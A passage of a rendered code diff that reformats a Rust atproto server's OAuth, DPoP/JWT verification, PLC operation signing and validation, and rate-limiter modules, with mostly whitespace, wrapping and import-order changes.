45
41
return Err(OAuthError::InvalidRequest(
46
42
"Too many requests. Please try again later.".to_string(),
···
54
50
"authorization_code" => {
55
51
handle_authorization_code_grant(state, headers, request, dpop_proof).await
56
52
}
57
-
"refresh_token" => {
58
-
handle_refresh_token_grant(state, headers, request, dpop_proof).await
59
-
}
53
+
"refresh_token" => handle_refresh_token_grant(state, headers, request, dpop_proof).await,
60
54
_ => Err(OAuthError::UnsupportedGrantType(format!(
61
55
"Unsupported grant_type: {}",
62
56
request.grant_type
+10
-18
src/oauth/error.rs
+10
-18
src/oauth/error.rs
···
37
37
OAuthError::InvalidClient(msg) => {
38
38
(StatusCode::UNAUTHORIZED, "invalid_client", Some(msg))
39
39
}
40
-
OAuthError::InvalidGrant(msg) => {
41
-
(StatusCode::BAD_REQUEST, "invalid_grant", Some(msg))
42
-
}
40
+
OAuthError::InvalidGrant(msg) => (StatusCode::BAD_REQUEST, "invalid_grant", Some(msg)),
43
41
OAuthError::UnauthorizedClient(msg) => {
44
42
(StatusCode::UNAUTHORIZED, "unauthorized_client", Some(msg))
45
43
}
46
44
OAuthError::UnsupportedGrantType(msg) => {
47
45
(StatusCode::BAD_REQUEST, "unsupported_grant_type", Some(msg))
48
46
}
49
-
OAuthError::InvalidScope(msg) => {
50
-
(StatusCode::BAD_REQUEST, "invalid_scope", Some(msg))
51
-
}
52
-
OAuthError::AccessDenied(msg) => {
53
-
(StatusCode::FORBIDDEN, "access_denied", Some(msg))
54
-
}
47
+
OAuthError::InvalidScope(msg) => (StatusCode::BAD_REQUEST, "invalid_scope", Some(msg)),
48
+
OAuthError::AccessDenied(msg) => (StatusCode::FORBIDDEN, "access_denied", Some(msg)),
55
49
OAuthError::ServerError(msg) => {
56
50
(StatusCode::INTERNAL_SERVER_ERROR, "server_error", Some(msg))
57
51
}
···
69
63
OAuthError::InvalidDpopProof(msg) => {
70
64
(StatusCode::UNAUTHORIZED, "invalid_dpop_proof", Some(msg))
71
65
}
72
-
OAuthError::ExpiredToken(msg) => {
73
-
(StatusCode::UNAUTHORIZED, "invalid_token", Some(msg))
74
-
}
75
-
OAuthError::InvalidToken(msg) => {
76
-
(StatusCode::UNAUTHORIZED, "invalid_token", Some(msg))
77
-
}
78
-
OAuthError::RateLimited => {
79
-
(StatusCode::TOO_MANY_REQUESTS, "rate_limited", Some("Too many requests. Please try again later.".to_string()))
80
-
}
66
+
OAuthError::ExpiredToken(msg) => (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)),
67
+
OAuthError::InvalidToken(msg) => (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)),
68
+
OAuthError::RateLimited => (
69
+
StatusCode::TOO_MANY_REQUESTS,
70
+
"rate_limited",
71
+
Some("Too many requests. Please try again later.".to_string()),
72
+
),
81
73
};
82
74
(
83
75
status,
+7
-5
src/oauth/mod.rs
+7
-5
src/oauth/mod.rs
···
1
-
pub mod types;
1
+
pub mod client;
2
2
pub mod db;
3
3
pub mod dpop;
4
-
pub mod jwks;
5
-
pub mod client;
6
4
pub mod endpoints;
7
5
pub mod error;
6
+
pub mod jwks;
8
7
pub mod templates;
8
+
pub mod types;
9
9
pub mod verify;
10
10
11
-
pub use types::*;
12
11
pub use error::OAuthError;
13
-
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
14
12
pub use templates::{DeviceAccount, mask_email};
13
+
pub use types::*;
14
+
pub use verify::{
15
+
OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
16
+
};
+21
-10
src/oauth/templates.rs
+21
-10
src/oauth/templates.rs
···
487
487
)
488
488
}
489
489
490
-
pub fn two_factor_page(
491
-
request_uri: &str,
492
-
channel: &str,
493
-
error_message: Option<&str>,
494
-
) -> String {
490
+
pub fn two_factor_page(request_uri: &str, channel: &str, error_message: Option<&str>) -> String {
495
491
let error_html = error_message
496
492
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
497
493
.unwrap_or_default();
498
494
let (title, subtitle) = match channel {
499
-
"email" => ("Check your email", "We sent a verification code to your email"),
500
-
"Discord" => ("Check Discord", "We sent a verification code to your Discord"),
501
-
"Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
495
+
"email" => (
496
+
"Check your email",
497
+
"We sent a verification code to your email",
498
+
),
499
+
"Discord" => (
500
+
"Check Discord",
501
+
"We sent a verification code to your Discord",
502
+
),
503
+
"Telegram" => (
504
+
"Check Telegram",
505
+
"We sent a verification code to your Telegram",
506
+
),
502
507
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
503
508
_ => ("Check your messages", "We sent you a verification code"),
504
509
};
···
546
551
}
547
552
548
553
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
549
-
let description = error_description.unwrap_or("An error occurred during the authorization process.");
554
+
let description =
555
+
error_description.unwrap_or("An error occurred during the authorization process.");
550
556
format!(
551
557
r#"<!DOCTYPE html>
552
558
<html lang="en">
···
618
624
if clean.is_empty() {
619
625
return "?".to_string();
620
626
}
621
-
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
627
+
clean
628
+
.chars()
629
+
.next()
630
+
.unwrap_or('?')
631
+
.to_uppercase()
632
+
.to_string()
622
633
}
623
634
624
635
pub fn mask_email(email: &str) -> String {
+4
-1
src/oauth/types.rs
+4
-1
src/oauth/types.rs
+43
-26
src/oauth/verify.rs
+43
-26
src/oauth/verify.rs
···
1
1
use axum::{
2
+
Json,
2
3
extract::FromRequestParts,
3
4
http::{StatusCode, request::Parts},
4
5
response::{IntoResponse, Response},
5
-
Json,
6
6
};
7
7
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
8
8
use hmac::{Hmac, Mac};
···
11
11
use sqlx::PgPool;
12
12
use subtle::ConstantTimeEq;
13
13
14
-
use crate::config::AuthConfig;
15
-
use crate::state::AppState;
14
+
use super::OAuthError;
16
15
use super::db;
17
16
use super::dpop::DPoPVerifier;
18
-
use super::OAuthError;
17
+
use crate::config::AuthConfig;
18
+
use crate::state::AppState;
19
19
20
20
pub struct OAuthTokenInfo {
21
21
pub did: String,
···
48
48
return Err(OAuthError::InvalidToken("Token has expired".to_string()));
49
49
}
50
50
if let Some(expected_jkt) = &token_data.parameters.dpop_jkt {
51
-
let proof = dpop_proof.ok_or_else(|| {
52
-
OAuthError::UseDpopNonce("DPoP proof required".to_string())
53
-
})?;
51
+
let proof = dpop_proof
52
+
.ok_or_else(|| OAuthError::UseDpopNonce("DPoP proof required".to_string()))?;
54
53
let config = AuthConfig::get();
55
54
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
56
55
let access_token_hash = compute_ath(access_token);
57
-
let result = verifier.verify_proof(proof, http_method, http_uri, Some(&access_token_hash))?;
56
+
let result =
57
+
verifier.verify_proof(proof, http_method, http_uri, Some(&access_token_hash))?;
58
58
if !db::check_and_record_dpop_jti(pool, &result.jti).await? {
59
59
return Err(OAuthError::InvalidDpopProof(
60
60
"DPoP proof has already been used".to_string(),
···
85
85
let header: serde_json::Value = serde_json::from_slice(&header_bytes)
86
86
.map_err(|_| OAuthError::InvalidToken("Invalid token header".to_string()))?;
87
87
if header.get("typ").and_then(|t| t.as_str()) != Some("at+jwt") {
88
-
return Err(OAuthError::InvalidToken("Not an OAuth access token".to_string()));
88
+
return Err(OAuthError::InvalidToken(
89
+
"Not an OAuth access token".to_string(),
90
+
));
89
91
}
90
92
if header.get("alg").and_then(|a| a.as_str()) != Some("HS256") {
91
-
return Err(OAuthError::InvalidToken("Unsupported algorithm".to_string()));
93
+
return Err(OAuthError::InvalidToken(
94
+
"Unsupported algorithm".to_string(),
95
+
));
92
96
}
93
97
let config = AuthConfig::get();
94
98
let secret = config.jwt_secret();
···
102
106
mac.update(signing_input.as_bytes());
103
107
let expected_sig = mac.finalize().into_bytes();
104
108
if !bool::from(expected_sig.ct_eq(&provided_sig)) {
105
-
return Err(OAuthError::InvalidToken("Invalid token signature".to_string()));
109
+
return Err(OAuthError::InvalidToken(
110
+
"Invalid token signature".to_string(),
111
+
));
106
112
}
107
113
let payload_bytes = URL_SAFE_NO_PAD
108
114
.decode(parts[1])
···
127
133
.and_then(|s| s.as_str())
128
134
.ok_or_else(|| OAuthError::InvalidToken("Missing sub claim".to_string()))?
129
135
.to_string();
130
-
let scope = payload.get("scope").and_then(|s| s.as_str()).map(|s| s.to_string());
136
+
let scope = payload
137
+
.get("scope")
138
+
.and_then(|s| s.as_str())
139
+
.map(|s| s.to_string());
131
140
let dpop_jkt = payload
132
141
.get("cnf")
133
142
.and_then(|c| c.get("jkt"))
···
152
161
let mut hasher = Sha256::new();
153
162
hasher.update(access_token.as_bytes());
154
163
let hash = hasher.finalize();
155
-
URL_SAFE_NO_PAD.encode(&hash)
164
+
URL_SAFE_NO_PAD.encode(hash)
156
165
}
157
166
158
167
pub fn generate_dpop_nonce() -> String {
···
186
195
)
187
196
.into_response();
188
197
if let Some(nonce) = self.dpop_nonce {
189
-
response.headers_mut().insert(
190
-
"DPoP-Nonce",
191
-
nonce.parse().unwrap(),
192
-
);
198
+
response
199
+
.headers_mut()
200
+
.insert("DPoP-Nonce", nonce.parse().unwrap());
193
201
}
194
202
response
195
203
}
···
198
206
impl FromRequestParts<AppState> for OAuthUser {
199
207
type Rejection = OAuthAuthError;
200
208
201
-
async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> {
209
+
async fn from_request_parts(
210
+
parts: &mut Parts,
211
+
state: &AppState,
212
+
) -> Result<Self, Self::Rejection> {
202
213
let auth_header = parts
203
214
.headers
204
215
.get("Authorization")
···
210
221
dpop_nonce: None,
211
222
})?;
212
223
let auth_header_trimmed = auth_header.trim();
213
-
let (token, is_dpop_token) = if auth_header_trimmed.len() >= 7 && auth_header_trimmed[..7].eq_ignore_ascii_case("bearer ") {
224
+
let (token, is_dpop_token) = if auth_header_trimmed.len() >= 7
225
+
&& auth_header_trimmed[..7].eq_ignore_ascii_case("bearer ")
226
+
{
214
227
(auth_header_trimmed[7..].trim(), false)
215
-
} else if auth_header_trimmed.len() >= 5 && auth_header_trimmed[..5].eq_ignore_ascii_case("dpop ") {
228
+
} else if auth_header_trimmed.len() >= 5
229
+
&& auth_header_trimmed[..5].eq_ignore_ascii_case("dpop ")
230
+
{
216
231
(auth_header_trimmed[5..].trim(), true)
217
232
} else {
218
233
return Err(OAuthAuthError {
···
222
237
dpop_nonce: None,
223
238
});
224
239
};
225
-
let dpop_proof = parts
226
-
.headers
227
-
.get("DPoP")
228
-
.and_then(|v| v.to_str().ok());
240
+
let dpop_proof = parts.headers.get("DPoP").and_then(|v| v.to_str().ok());
229
241
if let Ok(result) = try_legacy_auth(&state.db, token).await {
230
242
return Ok(OAuthUser {
231
243
did: result.did,
···
236
248
}
237
249
let http_method = parts.method.as_str();
238
250
let http_uri = parts.uri.to_string();
239
-
match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await {
251
+
match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await
252
+
{
240
253
Ok(result) => Ok(OAuthUser {
241
254
did: result.did,
242
255
client_id: Some(result.client_id),
···
259
272
})
260
273
}
261
274
Err(e) => {
262
-
let nonce = if is_dpop_token { Some(generate_dpop_nonce()) } else { None };
275
+
let nonce = if is_dpop_token {
276
+
Some(generate_dpop_nonce())
277
+
} else {
278
+
None
279
+
};
263
280
Err(OAuthAuthError {
264
281
status: StatusCode::UNAUTHORIZED,
265
282
error: "AuthenticationFailed".to_string(),
+96
-67
src/plc/mod.rs
+96
-67
src/plc/mod.rs
···
1
1
use base32::Alphabet;
2
2
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
3
-
use k256::ecdsa::{SigningKey, Signature, signature::Signer};
3
+
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
4
4
use reqwest::Client;
5
5
use serde::{Deserialize, Serialize};
6
-
use serde_json::{json, Value};
6
+
use serde_json::{Value, json};
7
7
use sha2::{Digest, Sha256};
8
8
use std::collections::HashMap;
9
9
use std::time::Duration;
···
102
102
.pool_max_idle_per_host(5)
103
103
.build()
104
104
.unwrap_or_else(|_| Client::new());
105
-
Self {
106
-
base_url,
107
-
client,
108
-
}
105
+
Self { base_url, client }
109
106
}
110
107
111
108
fn encode_did(did: &str) -> String {
···
126
123
status, body
127
124
)));
128
125
}
129
-
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
126
+
response
127
+
.json()
128
+
.await
129
+
.map_err(|e| PlcError::InvalidResponse(e.to_string()))
130
130
}
131
131
132
132
pub async fn get_document_data(&self, did: &str) -> Result<Value, PlcError> {
···
143
143
status, body
144
144
)));
145
145
}
146
-
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
146
+
response
147
+
.json()
148
+
.await
149
+
.map_err(|e| PlcError::InvalidResponse(e.to_string()))
147
150
}
148
151
149
152
pub async fn get_last_op(&self, did: &str) -> Result<PlcOpOrTombstone, PlcError> {
···
160
163
status, body
161
164
)));
162
165
}
163
-
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
166
+
response
167
+
.json()
168
+
.await
169
+
.map_err(|e| PlcError::InvalidResponse(e.to_string()))
164
170
}
165
171
166
172
pub async fn get_audit_log(&self, did: &str) -> Result<Vec<Value>, PlcError> {
···
177
183
status, body
178
184
)));
179
185
}
180
-
response.json().await.map_err(|e| PlcError::InvalidResponse(e.to_string()))
186
+
response
187
+
.json()
188
+
.await
189
+
.map_err(|e| PlcError::InvalidResponse(e.to_string()))
181
190
}
182
191
183
192
pub async fn send_operation(&self, did: &str, operation: &Value) -> Result<(), PlcError> {
184
193
let url = format!("{}/{}", self.base_url, Self::encode_did(did));
185
-
let response = self.client
186
-
.post(&url)
187
-
.json(operation)
188
-
.send()
189
-
.await?;
194
+
let response = self.client.post(&url).json(operation).send().await?;
190
195
if !response.status().is_success() {
191
196
let status = response.status();
192
197
let body = response.text().await.unwrap_or_default();
···
200
205
}
201
206
202
207
pub fn cid_for_cbor(value: &Value) -> Result<String, PlcError> {
203
-
let cbor_bytes = serde_ipld_dagcbor::to_vec(value)
204
-
.map_err(|e| PlcError::Serialization(e.to_string()))?;
208
+
let cbor_bytes =
209
+
serde_ipld_dagcbor::to_vec(value).map_err(|e| PlcError::Serialization(e.to_string()))?;
205
210
let mut hasher = Sha256::new();
206
211
hasher.update(&cbor_bytes);
207
212
let hash = hasher.finalize();
···
211
216
Ok(cid.to_string())
212
217
}
213
218
214
-
pub fn sign_operation(
215
-
operation: &Value,
216
-
signing_key: &SigningKey,
217
-
) -> Result<Value, PlcError> {
219
+
pub fn sign_operation(operation: &Value, signing_key: &SigningKey) -> Result<Value, PlcError> {
218
220
let mut op = operation.clone();
219
221
if let Some(obj) = op.as_object_mut() {
220
222
obj.remove("sig");
221
223
}
222
-
let cbor_bytes = serde_ipld_dagcbor::to_vec(&op)
223
-
.map_err(|e| PlcError::Serialization(e.to_string()))?;
224
+
let cbor_bytes =
225
+
serde_ipld_dagcbor::to_vec(&op).map_err(|e| PlcError::Serialization(e.to_string()))?;
224
226
let signature: Signature = signing_key.sign(&cbor_bytes);
225
227
let sig_bytes = signature.to_bytes();
226
228
let sig_b64 = URL_SAFE_NO_PAD.encode(sig_bytes);
···
238
240
services: Option<HashMap<String, PlcService>>,
239
241
) -> Result<Value, PlcError> {
240
242
let prev_value = match last_op {
241
-
PlcOpOrTombstone::Operation(op) => serde_json::to_value(op)
242
-
.map_err(|e| PlcError::Serialization(e.to_string()))?,
243
-
PlcOpOrTombstone::Tombstone(t) => serde_json::to_value(t)
244
-
.map_err(|e| PlcError::Serialization(e.to_string()))?,
243
+
PlcOpOrTombstone::Operation(op) => {
244
+
serde_json::to_value(op).map_err(|e| PlcError::Serialization(e.to_string()))?
245
+
}
246
+
PlcOpOrTombstone::Tombstone(t) => {
247
+
serde_json::to_value(t).map_err(|e| PlcError::Serialization(e.to_string()))?
248
+
}
245
249
};
246
250
let prev_cid = cid_for_cbor(&prev_value)?;
247
251
let (base_rotation_keys, base_verification_methods, base_also_known_as, base_services) =
···
309
313
prev: None,
310
314
sig: None,
311
315
};
312
-
let genesis_value = serde_json::to_value(&genesis_op)
313
-
.map_err(|e| PlcError::Serialization(e.to_string()))?;
316
+
let genesis_value =
317
+
serde_json::to_value(&genesis_op).map_err(|e| PlcError::Serialization(e.to_string()))?;
314
318
let signed_op = sign_operation(&genesis_value, signing_key)?;
315
319
let did = did_for_genesis_op(&signed_op)?;
316
320
Ok(GenesisResult {
···
331
335
}
332
336
333
337
pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
334
-
let obj = op.as_object()
338
+
let obj = op
339
+
.as_object()
335
340
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
336
-
let op_type = obj.get("type")
341
+
let op_type = obj
342
+
.get("type")
337
343
.and_then(|v| v.as_str())
338
344
.ok_or_else(|| PlcError::InvalidResponse("Missing type field".to_string()))?;
339
345
if op_type != "plc_operation" && op_type != "plc_tombstone" {
340
-
return Err(PlcError::InvalidResponse(format!("Invalid type: {}", op_type)));
346
+
return Err(PlcError::InvalidResponse(format!(
347
+
"Invalid type: {}",
348
+
op_type
349
+
)));
341
350
}
342
351
if op_type == "plc_operation" {
343
352
if obj.get("rotationKeys").is_none() {
344
-
return Err(PlcError::InvalidResponse("Missing rotationKeys".to_string()));
353
+
return Err(PlcError::InvalidResponse(
354
+
"Missing rotationKeys".to_string(),
355
+
));
345
356
}
346
357
if obj.get("verificationMethods").is_none() {
347
-
return Err(PlcError::InvalidResponse("Missing verificationMethods".to_string()));
358
+
return Err(PlcError::InvalidResponse(
359
+
"Missing verificationMethods".to_string(),
360
+
));
348
361
}
349
362
if obj.get("alsoKnownAs").is_none() {
350
363
return Err(PlcError::InvalidResponse("Missing alsoKnownAs".to_string()));
···
371
384
ctx: &PlcValidationContext,
372
385
) -> Result<(), PlcError> {
373
386
validate_plc_operation(op)?;
374
-
let obj = op.as_object()
387
+
let obj = op
388
+
.as_object()
375
389
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
376
-
let op_type = obj.get("type")
377
-
.and_then(|v| v.as_str())
378
-
.unwrap_or("");
390
+
let op_type = obj.get("type").and_then(|v| v.as_str()).unwrap_or("");
379
391
if op_type != "plc_operation" {
380
392
return Ok(());
381
393
}
382
-
let rotation_keys = obj.get("rotationKeys")
394
+
let rotation_keys = obj
395
+
.get("rotationKeys")
383
396
.and_then(|v| v.as_array())
384
397
.ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
385
-
let rotation_key_strings: Vec<&str> = rotation_keys
386
-
.iter()
387
-
.filter_map(|v| v.as_str())
388
-
.collect();
398
+
let rotation_key_strings: Vec<&str> = rotation_keys.iter().filter_map(|v| v.as_str()).collect();
389
399
if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
390
400
return Err(PlcError::InvalidResponse(
391
-
"Rotation keys do not include server's rotation key".to_string()
401
+
"Rotation keys do not include server's rotation key".to_string(),
392
402
));
393
403
}
394
-
let verification_methods = obj.get("verificationMethods")
404
+
let verification_methods = obj
405
+
.get("verificationMethods")
395
406
.and_then(|v| v.as_object())
396
-
.ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
397
-
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
398
-
if atproto_key != ctx.expected_signing_key {
399
-
return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
407
+
.ok_or_else(|| {
408
+
PlcError::InvalidResponse("verificationMethods must be an object".to_string())
409
+
})?;
410
+
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
411
+
&& atproto_key != ctx.expected_signing_key {
412
+
return Err(PlcError::InvalidResponse(
413
+
"Incorrect signing key".to_string(),
414
+
));
400
415
}
401
-
}
402
-
let also_known_as = obj.get("alsoKnownAs")
416
+
let also_known_as = obj
417
+
.get("alsoKnownAs")
403
418
.and_then(|v| v.as_array())
404
419
.ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
405
420
let expected_handle_uri = format!("at://{}", ctx.expected_handle);
···
409
424
.any(|s| s == expected_handle_uri);
410
425
if !has_correct_handle && !also_known_as.is_empty() {
411
426
return Err(PlcError::InvalidResponse(
412
-
"Incorrect handle in alsoKnownAs".to_string()
427
+
"Incorrect handle in alsoKnownAs".to_string(),
413
428
));
414
429
}
415
-
let services = obj.get("services")
430
+
let services = obj
431
+
.get("services")
416
432
.and_then(|v| v.as_object())
417
433
.ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
418
434
if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
419
-
let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
435
+
let service_type = pds_service
436
+
.get("type")
437
+
.and_then(|v| v.as_str())
438
+
.unwrap_or("");
420
439
if service_type != "AtprotoPersonalDataServer" {
421
440
return Err(PlcError::InvalidResponse(
422
-
"Incorrect type on atproto_pds service".to_string()
441
+
"Incorrect type on atproto_pds service".to_string(),
423
442
));
424
443
}
425
-
let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
444
+
let endpoint = pds_service
445
+
.get("endpoint")
446
+
.and_then(|v| v.as_str())
447
+
.unwrap_or("");
426
448
if endpoint != ctx.expected_pds_endpoint {
427
449
return Err(PlcError::InvalidResponse(
428
-
"Incorrect endpoint on atproto_pds service".to_string()
450
+
"Incorrect endpoint on atproto_pds service".to_string(),
429
451
));
430
452
}
431
453
}
432
454
Ok(())
433
455
}
434
456
435
-
pub fn verify_operation_signature(
436
-
op: &Value,
437
-
rotation_keys: &[String],
438
-
) -> Result<bool, PlcError> {
439
-
let obj = op.as_object()
457
+
pub fn verify_operation_signature(op: &Value, rotation_keys: &[String]) -> Result<bool, PlcError> {
458
+
let obj = op
459
+
.as_object()
440
460
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
441
-
let sig_b64 = obj.get("sig")
461
+
let sig_b64 = obj
462
+
.get("sig")
442
463
.and_then(|v| v.as_str())
443
464
.ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
444
465
let sig_bytes = URL_SAFE_NO_PAD
···
467
488
) -> Result<bool, PlcError> {
468
489
use k256::ecdsa::{VerifyingKey, signature::Verifier};
469
490
if !did_key.starts_with("did:key:z") {
470
-
return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
491
+
return Err(PlcError::InvalidResponse(
492
+
"Invalid did:key format".to_string(),
493
+
));
471
494
}
472
495
let multibase_part = &did_key[8..];
473
496
let (_, decoded) = multibase::decode(multibase_part)
474
497
.map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
475
498
if decoded.len() < 2 {
476
-
return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
499
+
return Err(PlcError::InvalidResponse(
500
+
"Invalid did:key data".to_string(),
501
+
));
477
502
}
478
503
let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 {
479
504
(0xe701u16, &decoded[2..])
480
505
} else {
481
-
return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
506
+
return Err(PlcError::InvalidResponse(
507
+
"Unsupported key type in did:key".to_string(),
508
+
));
482
509
};
483
510
if codec != 0xe701 {
484
-
return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string()));
511
+
return Err(PlcError::InvalidResponse(
512
+
"Only secp256k1 keys are supported".to_string(),
513
+
));
485
514
}
486
515
let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
487
516
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
+60
-66
src/rate_limit.rs
+60
-66
src/rate_limit.rs
···
1
1
use axum::{
2
+
Json,
2
3
body::Body,
3
4
extract::ConnectInfo,
4
5
http::{HeaderMap, Request, StatusCode},
5
6
middleware::Next,
6
7
response::{IntoResponse, Response},
7
-
Json,
8
8
};
9
9
use governor::{
10
10
Quota, RateLimiter,
11
11
clock::DefaultClock,
12
12
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
13
13
};
14
-
use std::{
15
-
net::SocketAddr,
16
-
num::NonZeroU32,
17
-
sync::Arc,
18
-
};
14
+
use std::{net::SocketAddr, num::NonZeroU32, sync::Arc};
19
15
20
16
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
21
17
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
···
44
40
impl RateLimiters {
45
41
pub fn new() -> Self {
46
42
Self {
47
-
login: Arc::new(RateLimiter::keyed(
48
-
Quota::per_minute(NonZeroU32::new(10).unwrap())
49
-
)),
50
-
oauth_token: Arc::new(RateLimiter::keyed(
51
-
Quota::per_minute(NonZeroU32::new(30).unwrap())
52
-
)),
53
-
oauth_authorize: Arc::new(RateLimiter::keyed(
54
-
Quota::per_minute(NonZeroU32::new(10).unwrap())
55
-
)),
56
-
password_reset: Arc::new(RateLimiter::keyed(
57
-
Quota::per_hour(NonZeroU32::new(5).unwrap())
58
-
)),
59
-
account_creation: Arc::new(RateLimiter::keyed(
60
-
Quota::per_hour(NonZeroU32::new(10).unwrap())
61
-
)),
62
-
refresh_session: Arc::new(RateLimiter::keyed(
63
-
Quota::per_minute(NonZeroU32::new(60).unwrap())
64
-
)),
65
-
reset_password: Arc::new(RateLimiter::keyed(
66
-
Quota::per_minute(NonZeroU32::new(10).unwrap())
67
-
)),
68
-
oauth_par: Arc::new(RateLimiter::keyed(
69
-
Quota::per_minute(NonZeroU32::new(30).unwrap())
70
-
)),
71
-
oauth_introspect: Arc::new(RateLimiter::keyed(
72
-
Quota::per_minute(NonZeroU32::new(30).unwrap())
73
-
)),
74
-
app_password: Arc::new(RateLimiter::keyed(
75
-
Quota::per_minute(NonZeroU32::new(10).unwrap())
76
-
)),
77
-
email_update: Arc::new(RateLimiter::keyed(
78
-
Quota::per_hour(NonZeroU32::new(5).unwrap())
79
-
)),
43
+
login: Arc::new(RateLimiter::keyed(Quota::per_minute(
44
+
NonZeroU32::new(10).unwrap(),
45
+
))),
46
+
oauth_token: Arc::new(RateLimiter::keyed(Quota::per_minute(
47
+
NonZeroU32::new(30).unwrap(),
48
+
))),
49
+
oauth_authorize: Arc::new(RateLimiter::keyed(Quota::per_minute(
50
+
NonZeroU32::new(10).unwrap(),
51
+
))),
52
+
password_reset: Arc::new(RateLimiter::keyed(Quota::per_hour(
53
+
NonZeroU32::new(5).unwrap(),
54
+
))),
55
+
account_creation: Arc::new(RateLimiter::keyed(Quota::per_hour(
56
+
NonZeroU32::new(10).unwrap(),
57
+
))),
58
+
refresh_session: Arc::new(RateLimiter::keyed(Quota::per_minute(
59
+
NonZeroU32::new(60).unwrap(),
60
+
))),
61
+
reset_password: Arc::new(RateLimiter::keyed(Quota::per_minute(
62
+
NonZeroU32::new(10).unwrap(),
63
+
))),
64
+
oauth_par: Arc::new(RateLimiter::keyed(Quota::per_minute(
65
+
NonZeroU32::new(30).unwrap(),
66
+
))),
67
+
oauth_introspect: Arc::new(RateLimiter::keyed(Quota::per_minute(
68
+
NonZeroU32::new(30).unwrap(),
69
+
))),
70
+
app_password: Arc::new(RateLimiter::keyed(Quota::per_minute(
71
+
NonZeroU32::new(10).unwrap(),
72
+
))),
73
+
email_update: Arc::new(RateLimiter::keyed(Quota::per_hour(
74
+
NonZeroU32::new(5).unwrap(),
75
+
))),
80
76
}
81
77
}
82
78
83
79
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
-
self.login = Arc::new(RateLimiter::keyed(
85
-
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
-
));
80
+
self.login = Arc::new(RateLimiter::keyed(Quota::per_minute(
81
+
NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()),
82
+
)));
87
83
self
88
84
}
89
85
90
86
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
91
-
self.oauth_token = Arc::new(RateLimiter::keyed(
92
-
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
93
-
));
87
+
self.oauth_token = Arc::new(RateLimiter::keyed(Quota::per_minute(
88
+
NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()),
89
+
)));
94
90
self
95
91
}
96
92
97
93
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
98
-
self.oauth_authorize = Arc::new(RateLimiter::keyed(
99
-
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
100
-
));
94
+
self.oauth_authorize = Arc::new(RateLimiter::keyed(Quota::per_minute(
95
+
NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()),
96
+
)));
101
97
self
102
98
}
103
99
104
100
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
105
-
self.password_reset = Arc::new(RateLimiter::keyed(
106
-
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
107
-
));
101
+
self.password_reset = Arc::new(RateLimiter::keyed(Quota::per_hour(
102
+
NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()),
103
+
)));
108
104
self
109
105
}
110
106
111
107
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
112
-
self.account_creation = Arc::new(RateLimiter::keyed(
113
-
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
114
-
));
